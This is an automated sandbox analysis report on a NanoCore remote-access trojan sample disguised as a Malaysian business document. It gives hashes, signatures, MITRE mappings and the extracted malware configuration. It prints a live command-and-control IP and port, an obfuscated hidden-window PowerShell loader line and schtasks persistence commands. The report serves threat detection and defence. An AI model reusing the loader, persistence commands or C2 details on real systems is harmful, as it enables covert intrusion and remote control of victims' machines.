Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
02-09-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe
Resource
win7-20240704-en
General
-
Target
8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe
-
Size
575KB
-
MD5
57b1a55d388f0beeed00b19b8370c05b
-
SHA1
c0055a01f0b7dc7a78178b64d37ef6fd67dcb314
-
SHA256
2d3b04606612dc4008fd108cf2a825a8c1e58e8ab5578abbbac77ea39ed4f73e
-
SHA512
19fc0e1b9cc4a9bdce1670be9d7516e5f64bab145cf87467136724ef18817636e66ede0016623959d21535c2819649871e1d287b9bd4b34a7525c98aac4009ee
-
SSDEEP
12288:Tv3EFV27dnw8BrOkOXyekQNyyXYpKvgZ4eu+72Tt36eX0dlPZ:DU2dn/B3O8QssqKvgqeu+4tnuX
Malware Config
Extracted
nanocore
1.2.2.0
134.19.179.203:31279
e3a8bae3-78c2-40a6-9bf2-4d7fbecfd001
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-06-11T02:19:05.486470936Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
31279
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
e3a8bae3-78c2-40a6-9bf2-4d7fbecfd001
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
134.19.179.203
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2112 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PCI Service = "C:\\Program Files (x86)\\PCI Service\\pcisvc.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\postscuttella\felix.lnk 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2796 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2112 powershell.exe 2796 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2112 set thread context of 2796 2112 powershell.exe 33 -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\bekldningsgenstands\Handelskurs247.fri 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe File created C:\Program Files (x86)\PCI Service\pcisvc.exe wab.exe File opened for modification C:\Program Files (x86)\PCI Service\pcisvc.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1360 schtasks.exe 2896 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2504 wrote to memory of 2112 2504 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe 30 PID 2504 wrote to memory of 2112 2504 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe 30 PID 2504 wrote to memory of 2112 2504 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe 30 PID 2504 wrote to memory of 2112 2504 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe 30 PID 2112 wrote to memory of 2796 2112 powershell.exe 33 PID 2112 wrote to memory of 2796 2112 powershell.exe 33 PID 2112 wrote to memory of 2796 2112 powershell.exe 33 PID 2112 wrote to memory of 2796 2112 powershell.exe 33 PID 2112 wrote to memory of 2796 2112 powershell.exe 33 PID 2112 wrote to memory of 2796 2112 powershell.exe 33 PID 2796 wrote to memory of 1360 2796 wab.exe 36 PID 2796 wrote to memory of 1360 2796 wab.exe 36 PID 2796 wrote to memory of 1360 2796 wab.exe 36 PID 2796 wrote to memory of 1360 2796 wab.exe 36 PID 2796 wrote to memory of 2896 2796 wab.exe 38 PID 2796 wrote to memory of 2896 2796 wab.exe 38 PID 2796 wrote to memory of 2896 2796 wab.exe 38 PID 2796 wrote to memory of 2896 2796 wab.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe"C:\Users\Admin\AppData\Local\Temp\8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Kviksoelv=Get-Content 'C:\Users\Admin\AppData\Local\Unspliced\fordelen\ecuadoriansk\Srgerand\Aandeligs.spi';$Spangled=$Kviksoelv.SubString(19245,3);.$Spangled($Kviksoelv)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "PCI Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE091.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1360
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "PCI Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE0FF.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2896
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55ccc18c3f1852b87de26278cba055c13
SHA19233db8c004ac3e1b34c0782bac706a17bdc43ae
SHA2567d588a9e361cccb0a3c97ec7ac99efe60e82932c64ab6efbfc929f51acb38432
SHA5121ad0e9d090e93bdfa76c7ff60c5492c43265f53adf0ac23a7c831231e12822b11bae6d0840f92c8deddc9e08dbb383d24073ece791feaf36687692a437294ed7
-
Filesize
1KB
MD5a4f6fa4537e2dcf0d3e2802c0f070a4d
SHA103545095bfeddd7656b5b8547ab84a810324a94f
SHA256192ac26e1895b267149bde35c55327f4a441693495239da5899062924d45bd11
SHA512a4293123d718b0511a8301a7f536e403cecf8bc89f25f9dc4692b293eb8a554a8eb67993a26fe0e96792b6eb3573b34e9b270777cafe95c2383268da6d40fd2e
-
Filesize
53KB
MD5a37c3952ee3893cbf89f852bfd3002b7
SHA1d788b7529db250df7e9e8ad7f3fa8f3bc4ad9035
SHA256f51cb72204c964faeb4992fcadacc7a127fa3fec435700b2c09aa46fa47ffaf7
SHA5127b94695d8788f692cb996becd245795d04d4cdfce4708c0d28095f82f004fe11397121eddabdca9813bca9fd7d27f596983bf83d059effc6ce128c8a49694e7e
-
Filesize
405KB
MD5d4717b9c25cc359ed707f3b965462a0a
SHA10e9947033f4ea69af4078c40fec3866b5ddd1be7
SHA256d85a65228850c98722cfaa887722406605a188246801819b64b327520693abf3
SHA5123dd4f606299763623e4ff78acd04b9b23eee93ccccf0a9b0fec34deb8e1841c16891d7d09b982def786c09e4f7b5e4eb7bd78febe45260c940053294f74beec6